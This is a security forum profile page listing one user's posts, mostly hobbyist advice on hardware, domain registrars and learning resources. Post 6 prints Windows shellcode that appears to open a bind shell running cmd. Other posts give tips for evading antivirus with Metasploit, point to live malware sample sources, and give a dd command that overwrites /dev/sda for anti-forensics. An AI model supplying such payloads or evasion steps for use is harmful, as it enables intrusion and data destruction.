
int0x80
Active Members
Posts: 160
Days Won: 3

Everything posted by int0x80

  1. I recommend learning to crack software, it's a fun challenge. Here is a good starting point: http://tuts4you.com/download.php?list.17 Keep us updated on your progress. People are more likely to help when you post specific questions showing effort on your part.
  2. There are some interesting ideas in the paper "How to Exit the Matrix". I've seen the paper mirrored at different places so just google if you can't find it. At the time of this post, the paper is currently at http://billstclair.com/matrix/
  3. You can also grab samples from http://www.malwaredomainlist.com/mdl.php Also I heard that Offensive Computing will be returning, but run by a different group of people at http://openmalware.org/
  4. Actually I've had good success bypassing AV with metasploit. Shellcode isn't too hard. Have you played with the nasm shell in metasploit? Another easy way for messing with shellcode is to just load a regular program in OllyDbg, scroll down to the NULLs at the end of the section, hit space, and start typing your assembly. The debugger will display the opcodes in the column to the left of the instructions.
  5. I usually use msfpayload and msfencode with -t exe for kicking out payloads in PE form. You can also do -f exe with msfvenom, iirc (don't have my bt5 vm up at the moment).
  6. Try this:

    shellcode = (
        "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
        "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
        "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
        "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
        "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
        "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
        "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
        "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
        "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
        "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
        "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
        "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
        "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
        "\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68"
        "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
        "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
        "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
        "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
        "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
        "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
        "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
        "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
        "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
    )
  7. I'm surprised there is internet run to Paper St. You're alone for half a mile in every direction, and you have to shut off the power when it rains ;)
  8. DBAN over PXE to wipe. If you're going to encrypt, you want a layer of random bytes as your last write to the drive before the encryption.
  9. Nice, and thanks! My hosting is on a server I colo. Just the DNS and SSL certs are through Gandi.
  10. There's that. Also your affiliation with the client may (read: will probably) show up when someone pulls a credit report. IMO, my employer, landlord, bank, et al do not need to know with whom I do business. Another fun aspect of GoDaddy is that GoDaddy will fine you if someone complains about your fake/inaccurate whois info. My current registrar is Gandi.net and they have been great; whois privacy is included wrt this thread. I left GoDaddy in a SOPA-induced rage and haven't looked back. Of particular endearment to me was Gandi's No BS policy: https://www.gandi.net/no-bullshit
  11. Never heard of that. Got any evidence or documentation?
  12. Are you ok with having that information published on the internet?
  13. Look into screen or tmux. I have this alias in my ~/.bash_aliases for when I connect and want to re-attach:

    alias screenr="screen -raAd"
  14. What's your bag? Give people some contextual clues on your interests and experience. Personally, I'd say get your 2 quid back and get a USB drive :]
  15. Anti-forensics: When I come back into the country, I generally rsync/ssh my data onto a server stateside, then zero the drive on the laptop. That way there is no confusion regarding disk contents. For good measure I give it a little:

    echo -n "Just us zeroes :]" | dd of=/dev/sda seek=$RANDOM

    Reference (NSFW): http://pt.reddit.com/r/AskReddit/comments/ndpe1/whats_your_best_it_was_the_most_inappropriate/c38bptk
  16. Anti-forensics: I haven't done much Windows anti-forensics research; in fact, you've given me some things to look up. One option you could consider is porting my scripts over and running them via cygwin or gnuwin32. If you've got FDE and you're running these wipes in cycles, you should be pretty well set. I haven't seen any Windows stuff that attacks inserted USB devices, but it would be a surprise if such software didn't already exist. Sorry to not be of much help on this one.
  17. I generally like http://hardforum.com when I spec a new system. There is a ton to know about hardware, if you're interested. Here is a good link to get started http://hardforum.com/showthread.php?t=1352290 The people there are also mostly helpful, so when you think you have a system shopped out, post a thread as per their FAQ and wait for feedback. Forum members often find better deals on the hardware you want or even better hardware at lower prices.
  18. Syngress: Windows Forensic Analysis is a fun read. There is always the 'try before you buy' model.
  19. Very cool! Encrypted volume was not an idea I had considered. That's awesome :D Today has been a long day and I still have lots to do, so give me some time to look through the code in the next few days and then I can adequately contribute to the thread :]
  20. It depends on where the targets are that you are attacking. If they are other guest VMs, then you can set them all to host-only. NAT should be ok in most situations if you need the BT5 VM to hit the internet.
  21. War Game Sites: Check out overthewire, smashthestack, and crackmes.de.
  22. You are their professional. Give them your professional opinion as a recommendation or as part of the report in your deliverables. Definitely the latter, at the very least.
  23. What is your limiting resource? Time? Money?
  24. Here is a great opportunity for you to sharpen your RE and assessment skills by playing with the firmware. Check out this series:

    Exploiting Embedded Systems – Part 1
    Exploiting Embedded Systems – Part 2
    Exploiting Embedded Systems – Part 3
    Exploiting Embedded Systems – Part 4